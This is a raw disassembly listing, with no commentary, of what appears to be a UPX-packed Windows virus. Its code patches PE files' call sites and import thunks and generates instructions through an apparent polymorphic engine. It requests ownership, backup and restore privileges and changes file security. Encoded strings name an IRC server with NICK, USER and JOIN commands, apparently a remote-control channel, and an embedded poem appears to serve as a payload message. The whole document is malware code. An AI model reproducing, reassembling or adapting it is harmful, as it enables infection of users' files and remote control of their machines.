call dword ptr ds:5A74C085h ; CODE XREF: UPX2:31012011�p
xor ebx, ebx
mov edx, eax
mov bl, 0Bh
add edx, [eax+3Ch]
lea esi, [ebp+101DCBh]
loc_31011EC0: ; CODE XREF: UPX2:31011E50�j
mov edi, [edx+10Ch]
mov ecx, [edx+108h]
add edi, eax
sub ecx, ebx
loc_31011ED0: ; CODE XREF: UPX2:31011ED9�j
pusha
mov ecx, ebx
repe cmpsb
popa
jz short loc_31011EDD
inc edi
loop loc_31011ED0
jmp short locret_31011F0B
; ---------------------------------------------------------------------------
loc_31011EDD: ; CODE XREF: UPX2:31011ED6�j
add edi, 0Fh
push ebx
mov ecx, esp
push edi
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push 0FFFFFFFFh
call dword ptr [ebp+103F22h]
mov ecx, [ebp+103E96h]
add esp, 0Ch
sub ecx, edi
sub ecx, 7
mov dword ptr [edi], 0E8006Ah
mov [edi+3], ecx
locret_31011F0B: ; CODE XREF: UPX2:31011EDB�j
retn
; ---------------------------------------------------------------------------
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
dd 72555000h, 7270D08Fh, 6D69786Fh, 6372692Eh, 616C6167h
dd 702E7978h, 494E006Ch, 6F204B43h, 726D636Dh, 0A696376h
dd 52455355h, 4F4A6320h, 26204E49h, 74726976h, 0E8550A75h
dd 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101EB5h
mov byte ptr [ebp+10157Fh], 0
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz short loc_31011FE1
push 1Eh
mov esi, [ebp+103E72h]
pop ecx
loc_31011FAE: ; CODE XREF: UPX2:loc_31011FDD�j
lodsb
cmp al, 2Eh
jnz short loc_31011FDD
cmp word ptr [esi], 1DFFh
jnz short loc_31011FDD
lea edi, [ebp+103F76h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+1038ECh]
pop dword ptr [ebp+103912h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_31011FDD: ; CODE XREF: UPX2:31011FB1�j
; UPX2:31011FB8�j
loop loc_31011FAE
jmp short loc_31012031
; ---------------------------------------------------------------------------
loc_31011FE1: ; CODE XREF: UPX2:31011FA3�j
call near ptr dword_31011688+47Fh
cmp dword ptr [esp+8], 4
jnz short loc_31012031
call near ptr loc_31011FF9+1
push ebx
inc esi
inc ebx
db 2Eh
inc esp
dec esp
dec esp
loc_31011FF9: ; CODE XREF: UPX2:31011FED�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add [ebx], cl
sal byte ptr [ebp+ecx-6Dh], 6Ah
add dl, [ebx-1]
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
call eax
xchg eax, ebx
call near ptr loc_31011EAB+2
call near ptr loc_31012025+1
push ebx
inc esi
inc ebx
pop edi
dec edi
push ebx
db 2Eh
inc esp
dec esp
dec esp
loc_31012025: ; CODE XREF: UPX2:31012016�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
loc_3101202D: ; CODE XREF: UPX2:loc_3101202D�j
jl short loc_3101202D
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
; ---------------------------------------------------------------------------
loc_31012031: ; CODE XREF: UPX2:31011FDF�j
; UPX2:31011FEB�j
call sub_31011636
dec dword ptr [ebp+1012D4h]
xor ecx, ecx
lea eax, [ebp+104324h]
push ecx
push ecx
push ecx
push ecx
push eax
push ecx
push ecx
push ecx
call dword ptr [ebp+103EC2h]
call near ptr loc_31012061+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31012061: ; CODE XREF: UPX2:31012052�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
db 0
dd 70737700h, 746E6972h, 50004166h, 3E6E95FFh, 85890010h
dd 103E76h, 8D8D310Fh, 101985h, 3F7C8589h, 0FF510010h
dd 103EC695h, 4689300h, 8D000000h, 101992B5h, 0BD8D5900h
dd 103F62h, 0FFF5C2E8h, 85C766FFh, 101E75h, 0A5835000h
dd 101E77h, 35958D00h, 5000101Eh, 6A016A54h, 2685200h
dd 0FF800000h, 103F6695h, 5AC08500h, 8D8D2275h, 101E68h
dd 8D066A52h, 101E75B5h, 50565400h, 0FF525150h, 103F6A95h
dd 95FF5800h, 103F62h, 418385C6h, 0E8000010h, 0Ch, 434F5357h
dd 2E32334Bh, 4C4C44h, 3EC695FFh, 68930010h, 7, 18E9B58Dh
dd 8D590010h, 103F32BDh, 0F53DE800h, 0CE8FFFFh, 57000000h
dd 4E494E49h, 442E5445h, 0FF004C4Ch, 103EC695h, 0FC08500h
dd 23584h, 5689300h, 8D000000h, 101927B5h, 0BD8D5900h
dd 103F4Eh, 0FFF506E8h, 52BD83FFh, 103Fh, 210840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 103F32h, 190C481h, 8B500000h
dd 52006AD4h, 3F5295FFh, 0C0850010h, 680D7559h, 1388h
dd 3EE695FFh, 0E2EB0010h, 1E77BD83h, 75000010h, 7B858D29h
dd 5000101Eh, 3F3E95FFh, 0C0850010h, 189840Fh, 408B0000h
dd 0FF008B0Ch, 77858F30h, 0C600101Eh, 10418385h, 6A0100h
dd 26A016Ah, 3F4A95FFh, 0F8830010h, 60840FFFh, 93000001h
dd 1E73958Dh, 106A0010h, 95FF5352h, 103F3Ah, 850FC085h
dd 140h, 1E94BD8Dh, 8B10010h, 0FFFA3CE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 0BE95FF54h, 8D00103Eh, 101EA2BDh, 0E801B100h
dd 0FFFFFA1Dh, 1E8F958Dh, 6A0010h, 1468h, 0FF535200h, 103F4695h
dd 24448D00h, 24958D14h, 50001043h, 8B0AB60Fh, 0C1142444h
dd 4A0208E0h, 24A1201h, 0B034A12h, 80082444h, 0E0C10FE1h
dd 440B5108h, 32FF1024h, 84BD8D50h, 0E800103Fh, 1Ch, 78362E25h
dd 2E202E20h, 25253A20h, 78382E25h, 25207825h, 4F4A0A73h
dd 204E49h, 7695FF57h, 8100103Eh, 0ACC4h, 50006A00h, 95FF5357h
dd 103F46h, 15988D8Bh, 6A0010h, 0C96B1BE3h, 5E8510Dh, 26000000h
dd 0A6425h, 7695FF57h, 8300103Eh, 0EB500CC4h, 7680Bh, 0BD8D0000h
dd 101EA8h, 95FF5357h, 103F46h, 547EC085h, 3F84B58Dh, 0A5830010h
dd 101598h, 838D8D00h, 2B001041h, 51006ACEh, 95FF5356h
dd 103F42h, 7E00F883h, 0FE8B912Fh, 3F84B58Dh, 0DB00010h
dd 1075AEF2h, 0FA2AE860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 3F84BD8Dh, 0A4F30010h, 0B9EBF787h, 3695FF53h
dd 8000103Fh, 10157FBDh, 2A740100h, 753068h, 0E695FF00h
dd 8000103Eh, 104183BDh, 11740000h, 1E7785C7h, 10h, 85C60000h
dd 104183h, 0FE08E900h, 85C7FFFFh, 101588h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0A8216574h, 294CA2A1h
dd 4810A614h, 32403752h, 0E5403752h, 9427B1FAh, 0B986E151h
dd 88658000h, 528F9087h, 5CD8B8B3h, 8FC26CCCh, 0C76898h
dd 14h dup(0)
dd 60000000h, 42F4A583h, 83000010h, 1042F8A5h, 0B70F0000h
; CODE XREF: UPX2:31013077�p
; UPX2:310130B4�p ...
dd 538D1443h, 4BB70F18h, 8BD00306h, 2B242444h, 19720C42h
dd 7308423Bh, 14428B14h, 890C422Bh, 1042F495h, 0F8858900h
dd 0EB001042h, 28C28305h, 0C261D9E2h, 85880004h, 102467h
dd 64E8h, 206800h, 858D0000h, 102394h, 74183959h, 4C0830Ch
dd 85FFF7E2h, 1042D0h, 3D9F7C3h, 1024678Dh, 0FF10E300h
dd 8FFC70h, 0E204E883h, 949D89F6h, 83001023h, 574003Ah
dd 7203322Bh, 0FC4E8D10h, 835E5B58h, 474003Ah, 3EB32FFh
dd 0E81072FFh, 0FFFFFF57h, 8D2BCE2Bh, 1042F8h, 344B0358h
dd 0D4858FC3h, 0C7001042h, 1042D085h, 0
dd 3CE800h, 858B0000h, 1042D0h, 0FFF6A9E8h, 18E8FFh, 0BD830000h
dd 1042D0h, 89087500h, 1024109Dh, 0FF9CEB00h, 1042D08Dh
dd 858FC300h, 1042D4h, 42D09589h, 3E80010h, 33000000h
dd 938BC3C9h, 80h, 0FEEDE852h, 9503FFFFh, 1042F8h, 7A83D603h
dd 840F000Ch, 107h, 107A83h, 0FD840Fh, 428B0000h, 0C8E8500Ch
dd 3FFFFFEh, 1042F885h, 50C60300h, 0F980088Ah, 80197400h
dd 3742EF9h, 8BF1EB40h, 0E1810148h, 0DFDFDFDFh, 4C44F981h
dd 0EC75004Ch, 83C82B59h, 8F0FFAF9h, 0B7h, 0FE788166h
dd 850F3233h, 0ABh, 3A8356h, 4A8B0575h, 8B02EB10h, 51F1030Ah
dd 0FFFE72E8h, 0F8B503FFh, 0AD001042h, 0FB78C085h, 84840Fh
dd 0B5FF0000h, 1042F8h, 0FE55E850h, 8503FFFFh, 1042F8h
dd 42F8858Fh, 4030010h, 0C0835324h, 0FDB3302h, 12E308B6h
dd 5320C980h, 42424C1h, 29241C29h, 405B240Ch, 0FB81E9EBh
dd 0DDBBD70Fh, 0FB813E74h, 0DB6E45A8h, 0FB813674h, 0FFA13B59h
dd 0FB812E74h, 0ACB522D6h, 0FB812674h, 0F358E993h, 0FB811E74h
dd 0F358E97Dh, 0FB811674h, 0E1253F46h, 0FB810E74h, 0E1253F30h
dd 95FF0674h, 1042D4h, 0FF71E95Bh, 835EFFFFh, 0EFE914C2h
dd 0C3FFFFFEh, 58046A01h, 0FFF549E8h, 419588FFh, 66001026h
dd 21831B8h, 3E4C0E2h, 0AB66E202h, 0E858066Ah, 0FFFFF52Eh
dd 8708C283h, 58056AD1h, 0FFF521E8h, 3FA80FFh, 50B00B73h
dd 26418502h, 0EBAA0010h, 58686A27h, 3FA80AAh, 11B01875h
dd 0FFF501E8h, 1B8FFh, 0D2840000h, 0E0D10D74h, 0F6EBCAFEh
dd 0B805EBh, 0AB800000h, 8DC3BFE2h, 1039CC95h, 0F7D72B00h
dd 85F7C3DAh, 1039C0h, 10000000h, 0C1C0950Fh, 85F60BE0h
dd 1039BEh, 66067501h, 0EB25890Dh, 0BE85F613h, 2001039h
dd 0D660675h, 4EB2531h, 25010D66h, 0BCE8AB66h, 8BFFFFFFh
dd 95893443h, 1042E8h, 85F7C3ABh, 1039C0h, 10000000h, 4C0950Fh
dd 9CE8AABCh, 89FFFFFFh, 1042EC95h, 0BE85F600h, 1001039h
dd 310F0475h, 0C02B02EBh, 85F7C3ABh, 1039C0h, 10000000h
dd 858A2774h, 1039BAh, 660BE0C1h, 66458B0Dh, 0AAF8B0ABh
dd 39BA858Ah, 0E0C10010h, 6467051Bh, 33AB0689h, 0EBAB66C0h
dd 8F64B812h, 8AAB0005h, 1039BA85h, 0C1580400h, 0C3AB18E0h
dd 279C85C6h, 0EB090010h, 0EBFCB025h, 0EBB86620h, 0EBAB6600h
dd 58046A19h, 0FFF409E8h, 0D2048DFFh, 6608E0C1h, 66C08905h
dd 0B003EBABh, 276AAA90h, 0F3F0E858h, 8580FFFFh, 10279Ch
dd 8FA8006h, 0D2842F73h, 2 dup(0CAFEC374h), 0CAFEC774h
dd 0CAFED974h, 0CAFE0C74h, 0CAFE0F74h, 0F9B00F74h, 87B0CBEBh
dd 0EBDBB0AAh, 0EBF5B0C4h, 0EBF8B0C0h, 85F7C3BCh, 1039C0h
dd 2000h, 27586B0h, 4F8D0404h, 0B8A58AFEh, 66001039h, 5FC80ABh
dd 0B00775h, 40FF4F80h, 0FF62E8AAh, 85F7FFFFh, 1039C0h
dd 4000h, 3166B866h, 29B40275h, 18B0AB66h, 39BA850Ah, 0E0C00010h
dd 3DE8AA03h, 0B0FFFFFFh, 0C085F788h, 1039h, 75000080h
dd 8A86B002h, 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h
dd 0C3AA40FFh, 39CCBD8Dh, 0DE80010h, 0F7FFFFFFh, 1039C085h
dd 40000000h, 0B0037400h, 85F7AA60h, 1039C0h, 10000000h
db 74h, 7, 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dd 0F020000h, 0F084h, 0AAE8B000h, 0D8BD89ABh, 0E8001042h
dd 0FFFFFECCh, 0ABAAE8B0h, 42DCBD89h, 0BDE80010h, 0F7FFFFFEh
dd 1039C085h, 300h, 0F71A7400h, 1039C085h, 0
dd 0E80A7402h, 0FFFFFE2Eh, 0FFFE9BE8h, 0AAE9B0FFh, 0D8858BABh
dd 8B001042h, 89C82BCFh, 1042E0BDh, 0FC488900h, 0FF6467B8h
dd 0C033AB36h, 85F7AB66h, 1039C0h, 3, 85F61374h, 1039BEh
dd 0E80A7480h, 0FFFFFDAAh, 0FFFE5BE8h, 6467B8FFh, 33AB2689h
dd 0F7AB66C0h, 1039C085h, 300h, 0F65A7400h, 1039BE85h
dd 0A758000h, 0FFFD81E8h, 0FE32E8FFh, 2E8FFFFh, 0B0FFFFFDh
dd 0FB14E820h, 39E3FFFFh, 15FFB866h, 0AB91AB66h, 39C0958Bh
dd 0D2F70010h, 3C2F7h, 14750000h, 0FFFCDCE8h, 0E81FB0FFh
dd 0FFFFFAEEh, 15FFB866h, 0AB91AB66h, 858BCF8Bh, 1042E0h
dd 4889C82Bh, 0C085F7FCh, 3001039h, 74000000h, 0C085F738h
dd 1039h, 740C0000h, 0C085F72Ch, 1039h, 75020000h, 0FDC2E80Ah
dd 4BE8FFFFh, 0F7FFFFFDh, 1039C085h, 0
dd 0E80A7408h, 0FFFFFDACh, 0FFFD61E8h, 0C085F7FFh, 4001039h
dd 74000000h, 0FD96E817h, 29B8FFFFh, 0ABC8FEC0h, 74C008B8h
dd 75B8AB04h, 0AB67EBF8h, 0FFFD7FE8h, 0C085F7FFh, 8001039h
dd 75000000h, 0BEBD8072h, 1039h, 65E86974h, 0B8FFFFFDh
dd 0C9291829h, 39BAA50Ah, 0E4C00010h, 0BAA50A03h, 0AB001039h
dd 0FFFD4BE8h, 0AAB1B0FFh, 39BE858Ah, 0E8AA0010h, 0FFFFFD3Ch
dd 0BA85B60Fh, 8D001039h, 4004C004h, 0B008E0C1h, 0B0AB668Dh
dd 0E857AA01h, 0FFFFFD20h, 66243C29h, 59FBE2B8h, 39C085F7h
dd 100010h, 7740000h, 66AA49B0h, 2FA75B8h, 0E8AB66E1h
dd 0FFFFFCFCh, 33AAE8B0h, 0BD89ABC0h, 1042C4h, 39C085F7h
dd 200010h, 3B750000h, 0FCDEE857h, 85F7FFFFh, 1039C0h
dd 80000000h, 0BD891874h, 1042F0h, 0FFFD39E8h, 0FCC2E8FFh
dd 0C3B0FFFFh, 0FCBAE8AAh, 8B5AFFFFh, 2B58B0CFh, 0B8850ACAh
dd 89001039h, 0E8AAFC4Ah, 0FFFFFCA4h, 0C081B866h, 39C085F7h
dd 400010h, 3740000h, 0A28C480h, 1039B8A5h, 89AB6600h
dd 1042C8BDh, 85F7AB00h, 1039C0h, 40000000h, 50B00975h
dd 39B88502h, 0F7AA0010h, 1039C085h, 8000h, 0B00B7500h
dd 0B9850AB8h, 0AA001039h, 0B8663DEBh, 85F71831h, 1039C0h
dd 100h, 29B00274h, 39B9A50Ah, 0E4C00010h, 0B9A50A03h
dd 66001039h, 81B866ABh, 0C085F7F0h, 1039h, 75000002h
dd 0AC8B402h, 1039B9A5h, 89AB6600h, 1042E4BDh, 29CCB800h
dd 0F7AB0000h, 1039C085h, 800h, 0E8717400h, 0FFFFFBFCh
dd 39C085F7h, 4000010h, 0B750000h, 850AB8B0h, 1039BAh
dd 0F74DEBAAh, 1039C085h, 80000h, 66117500h, 0AE083B8h
dd 1039BAA5h, 33AB6600h, 15EBAAC0h, 1829B866h, 39BAA50Ah
dd 0E4C00010h, 0BAA50A03h, 66001039h, 0C085F7ABh, 1039h
dd 66000010h, 74C081B8h, 8C48003h, 39BAA50Ah, 0AB660010h
dd 0BE85B60Fh, 0AB001039h, 0FFFB8BE8h, 0C085F7FFh, 1039h
dd 74400000h, 250B00Eh, 1039B885h, 71E8AA00h, 8DFFFFFBh
dd 8D89FE4Fh, 1042CCh, 39C085F7h, 10h, 17748000h, 8BAAE8B0h
dd 1042F085h, 83C72B00h, 89AB04E8h, 1042F0BDh, 0E805EB00h
dd 0FFFFFBB2h, 0FFFB3BE8h, 0C085F7FFh, 1039h, 75000100h
dd 0A40B00Bh, 1039B885h, 0FEBAA00h, 0C083B866h, 39B8A50Ah
dd 0AB660010h, 0F7AA01B0h, 1039C085h, 2000000h, 0F72F7500h
dd 1039C085h, 4000000h, 0B01A7500h, 0BA850AC0h, 8A001039h
dd 1039BFA5h, 10E0C100h, 8166B866h, 0EB00B0ABh, 0A40B008h
dd 1039BA85h, 85F7AA00h, 1039C0h, 80000h, 0B8661075h, 0A50AE883h
dd 1039B9h, 1B0AB66h, 48B008EBh, 39B9850Ah, 0E8AA0010h
dd 0FFFFFAB0h, 39C085F7h, 10h, 75B10010h, 0B8662575h, 0A50AF883h
dd 1039B9h, 0C033AB66h, 0CCBD29AAh, 0F7001042h, 1039C085h
dd 20000000h, 0B11F7500h, 661BEB77h, 0A1809B8h, 1039B9A5h
dd 3E4C000h, 39B9A50Ah, 0AB660010h, 42CCBD29h, 0C18A0010h
dd 42CCA58Ah, 0AB660010h, 850258B0h, 1039B8h, 0FA4AE8AAh
dd 85F7FFFFh, 1039C0h, 2000003h, 85F72C74h, 1039C0h, 8000000h
dd 85F72075h, 1039C0h, 6000000h, 0AFE80A75h, 0E8FFFFF9h
dd 0FFFFFA1Ch, 0FFF9D1E8h, 0FA12E8FFh, 85F7FFFFh, 1039C0h
dd 10000000h, 0C9B00874h, 0F9FEE8AAh, 85F7FFFFh, 1039C0h
dd 400000h, 7B02A74h, 39B8852Ah, 0E0C10010h, 8890D1Ah
dd 0A5020024h, 1039B8h, 8003E4C0h, 0E8AB04C4h, 0FFFFF9D0h
dd 0E8AA61B0h, 0FFFFF9C8h, 0E0FFB866h, 39B8A50Ah, 0AB660010h
dd 0FFF9B7E8h, 0C085F7FFh, 20001039h, 74000000h, 0C085F76Fh
dd 1039h, 74800000h, 8BC78B1Fh, 1042F08Dh, 89C12B00h, 0FFE8FC41h
dd 0E8FFFFF9h, 0FFFFF988h, 0E8AAC3B0h, 0FFFFF980h, 8D8BC78Bh
dd 1042C4h, 4189C12Bh, 0A58B0FCh, 1039B885h, 65E8AA00h
dd 0F7FFFFF9h, 1039C085h, 80000000h, 660C7400h, 0AC350B8h
dd 1039B885h, 660AEB00h, 0AE0FFB8h, 1039B8A5h, 0E8AB6600h
dd 0FFFFF93Ch, 39C085F7h, 30010h, 5F740200h, 858BCF8Bh
dd 1042DCh, 4889C82Bh, 0F7C933FCh, 1039C085h, 0
dd 8D0E7501h, 1039B885h
db 0
; ---------------------------------------------------------------------------
loc_31012F35: ; CODE XREF: UPX2:31012F3B�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31012F35
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31012F52
mov ax, 0C031h
stosw
loc_31012F52: ; CODE XREF: UPX2:31012F4A�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31012F6B
mov ax, 0C031h
stosw
loc_31012F6B: ; CODE XREF: UPX2:31012F63�j
mov al, 0C3h
stosb
; ---------------------------------------------------------------------------
dw 0D1E8h
db 0F8h ; ø
db 2 dup(0FFh), 8Dh
db 85h ; …
align 2
dw 1039h
db 0
; ---------------------------------------------------------------------------
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_31012F8B
push edi
sub edi, eax
pop eax
jmp short loc_31012FA4
; ---------------------------------------------------------------------------
loc_31012F8B: ; CODE XREF: UPX2:31012F83�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31012FA4: ; CODE XREF: UPX2:31012F89�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_31012FC4
neg eax
loc_31012FC4: ; CODE XREF: UPX2:31012FC0�j
stosd
retn 4
; ---------------------------------------------------------------------------
db 56h ; V
db 57h, 83h, 0BDh
db 0
db 43h, 10h, 0
db 0
db 0Fh, 84h, 0D9h
db 1
db 2 dup(0), 0E8h
db 0Dh
align 4
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 0FFh, 95h, 0AEh
db 3Eh ; >
db 10h, 0, 89h
db 85h ; …
db 14h, 43h, 10h
db 0
db 53h, 8Bh, 58h
db 3Ch ; <
db 3, 0D8h, 0FFh
db 73h ; s
db 28h, 8Bh, 43h
db 34h ; 4
db 0E8h, 0E5h, 0F4h
db 0FFh
db 0FFh, 8Bh, 95h
db 0F4h ; ô
db 42h, 10h, 0
db 5Bh ; [
db 3, 42h, 0Ch
db 89h ; ‰
db 85h, 18h, 43h
db 10h
align 2
dw 4203h
db 8
db 89h, 85h, 1Ch
db 43h ; C
db 10h, 0, 8Bh
db 73h ; s
db 28h, 0FFh, 0B3h
db 80h ; €
align 4
db 0E8h ; è
db 0BEh, 0F4h, 0FFh
db 0FFh
db 8Bh, 0BDh, 0F4h
db 42h ; B
db 10h, 0, 56h
db 0E8h ; è
db 0B2h, 0F4h, 0FFh
db 0FFh
db 8Bh, 95h, 0F4h
db 42h ; B
db 10h, 0, 8Bh
db 4Ah ; J
db 8, 3, 4Ah
db 0Ch
db 2Bh, 0CEh, 83h
db 0E9h ; é
db 5, 0Fh, 88h
db 60h ; `
db 1, 2 dup(0)
db 0Fh
db 84h, 5Ah, 1
db 0
align 2
dw 0B503h
db 0F8h ; ø
db 42h, 10h, 0
db 3
db 0B5h, 0B4h, 42h
db 10h
align 2
; START OF FUNCTION CHUNK FOR sub_31013181
loc_31013062: ; CODE XREF: sub_31013181+29�j
lodsb
cmp al, 0E8h
; END OF FUNCTION CHUNK FOR sub_31013181
jnz loc_3101310D
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_310124E8+3
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_31013090
cmp eax, [edi+0Ch]
jnb loc_310131A9
jmp short loc_3101309C
; ---------------------------------------------------------------------------
loc_31013090: ; CODE XREF: UPX2:31013083�j
cmp [ebp+1042F4h], edx
jnz loc_310131A9
loc_3101309C: ; CODE XREF: UPX2:3101308E�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_310131A9
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_310124E8+3
cmp [ebp+1042F4h], edi
jnz loc_310131A9
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_310131A9
cmp eax, [edi+8]
jnb loc_310131A9
; START OF FUNCTION CHUNK FOR sub_31013181
loc_310130E5: ; CODE XREF: sub_31013181+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_310131BF
jmp loc_310131A9
; END OF FUNCTION CHUNK FOR sub_31013181
; ---------------------------------------------------------------------------
loc_3101310D: ; CODE XREF: UPX2:31013065�j
cmp al, 0FFh
jnz loc_310131A9
cmp byte ptr [esi], 15h
jnz loc_310131A9
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_310124E8+3
cmp [ebp+1042F4h], edi
jnz short loc_310131A9
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_31013156
cmp eax, [ebp+10431Ch]
jb short loc_310131BF
loc_31013156: ; CODE XREF: UPX2:3101314C�j
cmp eax, 70000000h
jb short loc_31013194
call sub_31013181
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_31013180
add esp, 10h
push dword ptr [ecx]
pop dword ptr [esp+1Ch]
popa
jmp short loc_3101319B
; ---------------------------------------------------------------------------
locret_31013180: ; CODE XREF: UPX2:31013172�j
retn
; =============== S U B R O U T I N E =======================================
sub_31013181 proc near ; CODE XREF: UPX2:3101315D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 31013062 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 310130E5 SIZE 00000028 BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_310125B0+42h
popa
loc_31013194: ; CODE XREF: UPX2:3101315B�j
test eax, 80000000h
jnz short loc_310131A9
loc_3101319B: ; CODE XREF: UPX2:3101317E�j
sub eax, [edi+0Ch]
jb short loc_310131A9
cmp eax, [edi+8]
jb loc_310130E5
loc_310131A9: ; CODE XREF: UPX2:31013088�j
; UPX2:31013096�j ...
dec ecx
jnz loc_31013062
mov edi, [esp+4+var_4]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_31013201
; ---------------------------------------------------------------------------
loc_310131BF: ; CODE XREF: sub_31013181-7F�j
; UPX2:31013154�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_31013201: ; CODE XREF: sub_31013181+3C�j
pop edi
pop esi
retn
sub_31013181 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 57h ; W
db 0FFh, 95h, 0BAh
db 3Eh ; >
db 10h, 0, 0C1h
db 0E8h ; è
db 1Fh, 0Fh, 85h
db 1Ah
db 1, 2 dup(0)
db 50h ; P
db 54h, 6Ah, 28h
db 6Ah ; j
db 2 dup(0FFh), 95h
db 1Ah
db 3Fh, 10h, 0
db 85h ; …
db 0C0h, 5Fh, 0Fh
db 88h ; ˆ
db 5, 1, 0
db 0
db 0E8h, 58h, 0E4h
db 0FFh
db 0FFh, 0E8h, 11h
db 0
db 2 dup(0), 53h
aEtfilesecurity db 'etFileSecurityA',0
db 0FFh
db 0B5h, 88h, 42h
db 10h
align 2
dw 95FFh
db 6Eh ; n
db 3Eh, 10h, 0
db 89h ; ‰
db 85h, 90h, 42h
db 10h
align 2
dw 19E8h
db 0
db 2 dup(0), 53h
aEtakeownership db 'eTakeOwnershipPrivilege',0
db 57h ; W
db 0E8h, 29h, 0E8h
db 0FFh
db 0FFh, 0E8h, 13h
db 0
db 2 dup(0), 53h
aErestoreprivil db 'eRestorePrivilege',0
dw 0E857h
db 0Bh
db 0E8h, 2 dup(0FFh)
db 0E8h ; è
db 12h, 2 dup(0)
db 0
aSebackupprivil db 'SeBackupPrivilege',0
db 57h
dd 0FFE7EEE8h, 18E8FFh, 65530000h, 6E616843h, 6F4E6567h
dd 79666974h, 76697250h, 67656C69h, 0E8570065h, 0FFFFE7CBh
dd 858D5450h, 103DCCh, 6A50646Ah, 95FF5701h, 103F26h, 0FF243C89h
dd 103E6295h, 8DC02A00h, 104184BDh, 50505000h, 3DCCB5FFh
dd 1680010h, 54000400h, 0FF57016Ah, 10429095h, 46A5400h
dd 9095FF57h, 83001042h, 0B5FF14C4h, 104288h, 3E9E95FFh
dd 0C35F0010h, 4184B58Dh, 0FF560010h, 103EA295h, 0FFF88300h
dd 0BB840Fh, 85890000h, 104294h, 0FF56006Ah, 103EDE95h
dd 0FC08500h, 0A484h, 50C02B00h, 50036A50h, 68016Ah, 56C00000h
dd 3E7E95FFh, 0F8830010h, 7840FFFh, 89000006h, 10429885h
dd 9C8D8D00h, 8D001042h, 1042A495h, 6A525100h, 95FF5000h
dd 103EAAh, 0FFFF883h, 5D584h, 0FF006A00h, 104298B5h, 0A695FF00h
dd 8300103Eh, 840FFFF8h, 5BEh, 42AC8589h, 0C9330010h, 5051C303h
dd 51046A51h, 4298B5FFh, 95FF0010h, 103E82h, 840FC085h
dd 59Ah, 8589C933h, 1042B0h, 68515151h, 0F001Fh, 0CA95FF50h
